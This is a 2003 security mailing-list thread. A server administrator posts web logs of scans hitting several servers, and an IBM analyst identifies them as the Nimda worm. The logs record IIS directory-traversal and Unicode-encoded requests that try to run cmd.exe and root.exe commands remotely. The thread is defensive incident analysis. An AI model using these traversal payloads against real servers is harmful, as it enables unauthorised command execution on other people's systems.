Re: Anyone know this tool?

From: Jason Falciola (falciola_at_us.ibm.com)
Date: 07/29/03

  • Next message: Jeff Adams: "RE: Exploit for Windows RPC may be in the wild!" 
    To: Danny <danny@eboundary.com>
Date: Tue, 29 Jul 2003 12:57:16 -0400

    Looks like plain old Nimda to me. Someone please correct me if I'm
    missing something obvious.

    <http://www.cert.org/advisories/CA-2001-26.html>

    Jason Falciola
    Security Intelligence Analyst
    IBM Managed Security Services
    falciola@us.ibm.com

    Danny <danny@eboundary.com>
    07/28/2003 11:24 PM

     
            To: incidents@securityfocus.com
            cc:
            Subject: Anyone know this tool?

    Does anyone happen to know what tool this is? I've seen the exact same
    scans on 6 of our servers on completely different networks. All the
    scans have been from different source IP's and all the servers were hit
    within a space of a few hours.

    Curiosity is getting the better of me since i've never seen this exact
    pattern before :)

    64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
    /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
    /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
    winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"
    "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET
    /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

    Danny
    Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
    Play - http://www.eBoundary.net - Who really sets your electronic
    boundaries?
    AIM: eBoundaryTch | ICQ: 3090141

    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------

    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------

  • Next message: Jeff Adams: "RE: Exploit for Windows RPC may be in the wild!"